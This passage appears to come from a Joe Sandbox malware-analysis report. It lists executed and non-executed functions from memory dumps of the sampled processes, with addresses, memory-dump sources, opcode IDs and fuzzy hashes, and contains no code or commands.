                                                                                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                            Function 00007FFD9B763EF0 Relevance: .0, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b760000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                                            • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                                                                            • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                                            • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                                                                            Function 00007FFD9B751DC0 Relevance: .0, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b750000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ff3051ce8f092a69e22551edfefc58e64b516ddd8f195051f1ddaf51897b9e82
                                                                                                                            • Instruction ID: 4eaf232e06f4fc78891fe36b25e7d65f0a7da15d4abc5d584ad1dfd486b932c8
                                                                                                                            • Opcode Fuzzy Hash: ff3051ce8f092a69e22551edfefc58e64b516ddd8f195051f1ddaf51897b9e82
                                                                                                                            • Instruction Fuzzy Hash: 88E01A74F0D61E87FB68A2C4C8617E97265EB88300F150678DA1E933E5CEA8AE428655
                                                                                                                            Function 00007FFD9B78D8D9 Relevance: .0, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bbf905f8e019aeb8e37b9ff8eccfe037cb1c082170d651a141763345b37719eb
                                                                                                                            • Instruction ID: fd7852c4a2d2227a7354cd72b8eb8f8542edebb1600eaba70fdc1156c538e655
                                                                                                                            • Opcode Fuzzy Hash: bbf905f8e019aeb8e37b9ff8eccfe037cb1c082170d651a141763345b37719eb
                                                                                                                            • Instruction Fuzzy Hash: 1CE04F2194F7C04FC70B973488B88547F60DF5B21178A41EEC085CF5B3EA2D8849C702
                                                                                                                            Function 00007FFD9B7775D4 Relevance: .0, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B773000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B773000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b773000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d36c2615ee497753c631bdfff493ff9d2c893c1d4e8c7463a8eda83e85678dfa
                                                                                                                            • Instruction ID: 4bece6d7a000f533149e36f5462342a41a16384c51eb213c8d814376681a561e
                                                                                                                            • Opcode Fuzzy Hash: d36c2615ee497753c631bdfff493ff9d2c893c1d4e8c7463a8eda83e85678dfa
                                                                                                                            • Instruction Fuzzy Hash: C3D0A74370FF4D06E219875C78E20B4F7C4EB5103575503F7D065431A1CDCB25A34180
                                                                                                                            Function 00007FFD9B78CC29 Relevance: .0, Instructions: 20COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2c3873b2e80135705462e9ac236b10f5d5fd4c24e244cce761d253de320855b8
                                                                                                                            • Instruction ID: ac4e1c4b3cc89a29aa9ded6186f70ff1c5697cd6e9265ba552848f553e86a447
                                                                                                                            • Opcode Fuzzy Hash: 2c3873b2e80135705462e9ac236b10f5d5fd4c24e244cce761d253de320855b8
                                                                                                                            • Instruction Fuzzy Hash: E0E0EC2154E7C44FC70A9B2488A5D553FB0AF5711178A41EBC449CF6B3D6599C88C752
                                                                                                                            Function 00007FFD9B781AF0 Relevance: .0, Instructions: 18COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                            • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                            • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                            • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                            Function 00007FFD9B78B7D8 Relevance: .0, Instructions: 17COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 326fddfa3e6338c3e5d2f0e00ff13dfa1b6452360b5d368467cabd64d0f95c06
                                                                                                                            • Instruction ID: 3de3e55db9ffd38b59860a5760cf81d535eda5b52cb0bd577d59d4d1cdc8560f
                                                                                                                            • Opcode Fuzzy Hash: 326fddfa3e6338c3e5d2f0e00ff13dfa1b6452360b5d368467cabd64d0f95c06
                                                                                                                            • Instruction Fuzzy Hash: BED02230B50E040FC70CA63C8C98C703390EBAA20378100ACD00BC72B1D92ADC89C740
                                                                                                                            Function 00007FFD9B786F10 Relevance: .0, Instructions: 17COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                                                                                            • Instruction ID: 96459cc03289447f672a929809153bcad38ec1426e449cebc560d9455d7c56e3
                                                                                                                            • Opcode Fuzzy Hash: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                                                                                            • Instruction Fuzzy Hash: 59D02230B51D040FC70CE63C88988307390EB6A2037C100A8D00BC72B1E92ADC88C781
                                                                                                                            Function 00007FFD9B7682FE Relevance: .0, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b760000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 35d6aead272d1ee6e2c71fd383b2776b5cf1514df1070b7ec21824df4768ecb5
                                                                                                                            • Instruction ID: 250183c41128ea5ecd8d4b9ba0d81326a196b8d432636eca6e7471725ad9da20
                                                                                                                            • Opcode Fuzzy Hash: 35d6aead272d1ee6e2c71fd383b2776b5cf1514df1070b7ec21824df4768ecb5
                                                                                                                            • Instruction Fuzzy Hash: 7FE0E630E0961DCFE7709754C8587AC7161BB04304F9503F5C00DA31E5CB796D819B41
                                                                                                                            Function 00007FFD9B750D34 Relevance: .0, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b750000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                            • Instruction ID: d13d39a6bcb6e22f33fd5431c04bc28ba79635e90f3539f56ae3d56a3e3403f4
                                                                                                                            • Opcode Fuzzy Hash: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                            • Instruction Fuzzy Hash: CFE01234B0930ECBE710DBD4C4946ED7761EB52711F104765C401872E9DAB86785C680
                                                                                                                            Function 00007FFD9B7644BD Relevance: .0, Instructions: 12COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b760000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0eba545791ef4226e8dc3264fabcc99d28677d7936fc820deebd12be66bea4d7
                                                                                                                            • Instruction ID: 1622fb89df82485c1f6594341c112adfba536242e7061772e6e14edbc902c50c
                                                                                                                            • Opcode Fuzzy Hash: 0eba545791ef4226e8dc3264fabcc99d28677d7936fc820deebd12be66bea4d7
                                                                                                                            • Instruction Fuzzy Hash: 46D09E70E2851ECEEB58EF94C865ABD76B1BF44304F500175E429972DADF3829014741
                                                                                                                            Function 00007FFD9B754960 Relevance: .0, Instructions: 10COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b750000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 81a6eeb805bee0c7f614017dfc8da739e800dd75c04c813e1bdb17f5d6072185
                                                                                                                            • Instruction ID: 4a5968a2307e6434619aef5999c6a0f394fb6a582e40ea965668a353b51f9538
                                                                                                                            • Opcode Fuzzy Hash: 81a6eeb805bee0c7f614017dfc8da739e800dd75c04c813e1bdb17f5d6072185
                                                                                                                            • Instruction Fuzzy Hash: FAC08C10F1CD1A06F7596244043023D04029B40208F8003B0E41E833CECD0C1E0252CB

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFD9B7606FA Relevance: 9.0, Strings: 7, Instructions: 222COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b760000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: =O_^$O_^%$O_^($O_^*$O_^+$O_^2$O_^4
                                                                                                                            • API String ID: 0-1144829533
                                                                                                                            • Opcode ID: dee7f2d1e639cf14b53bf738e9f7380ac36580a0ad33fbde6e528c86799fa016
                                                                                                                            • Instruction ID: acfe2133a43534197fa9225e4a42b6d4af8a191dd5ac6861501ef6ecb7d7a26b
                                                                                                                            • Opcode Fuzzy Hash: dee7f2d1e639cf14b53bf738e9f7380ac36580a0ad33fbde6e528c86799fa016
                                                                                                                            • Instruction Fuzzy Hash: F751A06BA8C5264DE31936A935A68FD2701CF61339B0846B3F12F890DB8E1CA58249D9
                                                                                                                            Function 00007FFD9B76063D Relevance: 7.8, Strings: 6, Instructions: 297COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b760000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: =O_^$O_^($O_^*$O_^+$O_^2$O_^4
                                                                                                                            • API String ID: 0-1414841115
                                                                                                                            • Opcode ID: 8f61f484d62c3509d7e9b5f0d416ccc76f5d7a647ab229cb8632ae63fa586ca2
                                                                                                                            • Instruction ID: 58199088c9f430d12496dbb14553b357cab811ba19f35a99cbdc02998c29dbcb
                                                                                                                            • Opcode Fuzzy Hash: 8f61f484d62c3509d7e9b5f0d416ccc76f5d7a647ab229cb8632ae63fa586ca2
                                                                                                                            • Instruction Fuzzy Hash: DC81021BB8C6260CE31977BD75A29FD3701DFA0339B0846B7F26E8D0D78E18648649D5
                                                                                                                            Function 00007FFD9B7606D3 Relevance: 5.2, Strings: 4, Instructions: 226COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b760000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: O_^*$O_^+$O_^2$O_^4
                                                                                                                            • API String ID: 0-1903236095
                                                                                                                            • Opcode ID: bbbdba3f8da3ea6fa45548024b1b9a7acb4bb994db2dcb56f6a65523ae7977f1
                                                                                                                            • Instruction ID: e7060d3b81791bc6cbfb82b01157a7e46995fb60fae9eafeedcfa8aa2e71ec8a
                                                                                                                            • Opcode Fuzzy Hash: bbbdba3f8da3ea6fa45548024b1b9a7acb4bb994db2dcb56f6a65523ae7977f1
                                                                                                                            • Instruction Fuzzy Hash: A051AF2BB8C5260DE31977B935A68FD2701CF61339B0886F7F16F8D0DB4E18658249D9

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFD9B750D48 Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.1841901607.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b750000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 5\_H
                                                                                                                            • API String ID: 0-3325266018
                                                                                                                            • Opcode ID: a9e988ce6fef7dd456c6c2b01dc1241969e04724036aff45ae9543ccf2f8fdcc
                                                                                                                            • Instruction ID: 37889b952c5571d706c43fd0ed1bf5fcb2dae4b5e9969539a9e845e7fe861775
                                                                                                                            • Opcode Fuzzy Hash: a9e988ce6fef7dd456c6c2b01dc1241969e04724036aff45ae9543ccf2f8fdcc
                                                                                                                            • Instruction Fuzzy Hash: 86910675A1DA8D4FE759DFA888397A9BFE0FF56310F0102BAD049C72F2DAB814118740
                                                                                                                            Function 00007FFD9B7508D0 Relevance: .2, Instructions: 163COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.1841901607.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b750000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6ea5bd73590d860f4d740213c455f4deb90d59e0b9b67462b89031517307a8fa
                                                                                                                            • Instruction ID: fac6233fa20c73bfd4c9635e5085bb06336094873f877668203325fcf8bf1dfc
                                                                                                                            • Opcode Fuzzy Hash: 6ea5bd73590d860f4d740213c455f4deb90d59e0b9b67462b89031517307a8fa
                                                                                                                            • Instruction Fuzzy Hash: 37414C26B4C6590EE308B7BC74A5AFD7781DF49324B0546FBE04DC71E7DE14A84286C0
                                                                                                                            Function 00007FFD9B750910 Relevance: .2, Instructions: 152COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.1841901607.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b750000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7716022e067fc394ba75f4556e0d127e3287ba57c4293b57f13805cc6f4dba1d
                                                                                                                            • Instruction ID: 223779cc0dcc917cca0e1ca3b664bd407f618ede17585314ccaa1de2e4baf1af
                                                                                                                            • Opcode Fuzzy Hash: 7716022e067fc394ba75f4556e0d127e3287ba57c4293b57f13805cc6f4dba1d
                                                                                                                            • Instruction Fuzzy Hash: BA413926B4C6590EE308B7B864AA9FD7781EF59324B0546FBE04DC71E7CE18A8428680
                                                                                                                            Function 00007FFD9B750960 Relevance: .1, Instructions: 117COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.1841901607.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b750000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b5282a9d078d762a361c851a9db44486d6789bd41b28bf55bbd3763a8e1cf913
                                                                                                                            • Instruction ID: f5fb2b52c92f0fa297fe0e5df918968c6f44733380ab68264ba1120858e4abc6
                                                                                                                            • Opcode Fuzzy Hash: b5282a9d078d762a361c851a9db44486d6789bd41b28bf55bbd3763a8e1cf913
                                                                                                                            • Instruction Fuzzy Hash: 9A313F26B1CA1D0FE358B7AC646AAF973C2DF58321B0106FAE40EC32F7CD18AC414280
                                                                                                                            Function 00007FFD9B750998 Relevance: .1, Instructions: 92COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.1841901607.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b750000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 17742e49536ceb6a2804abb286d09c4742adcc2c558021b60a0481cd23c1173b
                                                                                                                            • Instruction ID: bfe4e91a729a73b3b1cfd0ef80c3a0811739b93a30077706cf924e73a9ed1810
                                                                                                                            • Opcode Fuzzy Hash: 17742e49536ceb6a2804abb286d09c4742adcc2c558021b60a0481cd23c1173b
                                                                                                                            • Instruction Fuzzy Hash: 9821FF21B19A1D0FE758E76C546E675B7C2EB9C311B5101B9E40DC33F7DD64EC428281
                                                                                                                            Function 00007FFD9B750C25 Relevance: .1, Instructions: 83COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.1841901607.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b750000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 90f2e5be582b7054874806dd7cc30839b9d311c3a0f7c83db2a41c91ca4cbf62
                                                                                                                            • Instruction ID: 1a1af83695c867b5f91984fb12c8c53fa0a8808c7327c067cf9a8265e31af2cf
                                                                                                                            • Opcode Fuzzy Hash: 90f2e5be582b7054874806dd7cc30839b9d311c3a0f7c83db2a41c91ca4cbf62
                                                                                                                            • Instruction Fuzzy Hash: 4B21E736B0D38D9FE722A7E898650EC7B60EF43320F1546B7D048DB1E3DA6826478795
                                                                                                                            Function 00007FFD9B756872 Relevance: .1, Instructions: 57COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.1841901607.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b750000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 52e121c2c9423e4a67b448b56270e45b151d147975770dfe46b504b69f235960
                                                                                                                            • Instruction ID: 796fd97ece9a0aacbcf591d1cbc509915b7eba9434f2399a4458689e8fd42403
                                                                                                                            • Opcode Fuzzy Hash: 52e121c2c9423e4a67b448b56270e45b151d147975770dfe46b504b69f235960
                                                                                                                            • Instruction Fuzzy Hash: 8C118620E1DA1D4FEBB4E69884756F872A0FF18700F5102F9D44EE72B2EE68BE464740
                                                                                                                            Function 00007FFD9B750C38 Relevance: .1, Instructions: 54COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.1841901607.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b750000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3b0c2ffa6665a2df569256c7fbe9d791df5440899799b91f48487b717e2f3720
                                                                                                                            • Instruction ID: faeafb706778a015d3b18950af121ad0ab43dea44d1751fe1d0972b0ac955fa4
                                                                                                                            • Opcode Fuzzy Hash: 3b0c2ffa6665a2df569256c7fbe9d791df5440899799b91f48487b717e2f3720
                                                                                                                            • Instruction Fuzzy Hash: 44119E35A0E38D9FE722DBA888650ED7BB0AF43610F0646B7D084DB1E2D974264A8780
                                                                                                                            Function 00007FFD9B750C48 Relevance: .0, Instructions: 42COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.1841901607.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b750000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 49936b6887795164c907375ee1043e405fcf8e3bb14fd87297b1444699e50a44
                                                                                                                            • Instruction ID: 764f6ec27531d70b7f22d004b3e76a1536ab465e7ff752a3a120844df79a9697
                                                                                                                            • Opcode Fuzzy Hash: 49936b6887795164c907375ee1043e405fcf8e3bb14fd87297b1444699e50a44
                                                                                                                            • Instruction Fuzzy Hash: 45018035A0E38D8FE712DBA4886109C7FB0AF43700F1646E7D044DB1E2DA746A468741
                                                                                                                            Function 00007FFD9B7569C4 Relevance: .0, Instructions: 39COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.1841901607.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b750000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3323aae89c1bedd356b3c2582cd0b71c2f4b94ef4899667e5a57298e512f4ce6
                                                                                                                            • Instruction ID: 1ce3617c0fbc57bcc36b16c0d4d66970fc82629c0001eb48c12c3e145ba1006f
                                                                                                                            • Opcode Fuzzy Hash: 3323aae89c1bedd356b3c2582cd0b71c2f4b94ef4899667e5a57298e512f4ce6
                                                                                                                            • Instruction Fuzzy Hash: 36016230A0951E4EEB74A6C0D8647F873A0FB54301F1102BAC44EE31B2EE687E828A41
                                                                                                                            Function 00007FFD9B750C50 Relevance: .0, Instructions: 37COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.1841901607.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b750000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 00bb79627ce4cc3d657452bed5adbb0d1c07d38387a2acc6d886136808c16a50
                                                                                                                            • Instruction ID: a2c3fe6029a1f6146dec0c41b54f228449e13c5c2fe626109115673607463086
                                                                                                                            • Opcode Fuzzy Hash: 00bb79627ce4cc3d657452bed5adbb0d1c07d38387a2acc6d886136808c16a50
                                                                                                                            • Instruction Fuzzy Hash: 6D017C34E0E38D9FE722DBA488640AD7FB0AF03700F1546E7D044DB2A6DA786A458741
                                                                                                                            Function 00007FFD9B755E02 Relevance: .0, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.1841901607.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b750000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
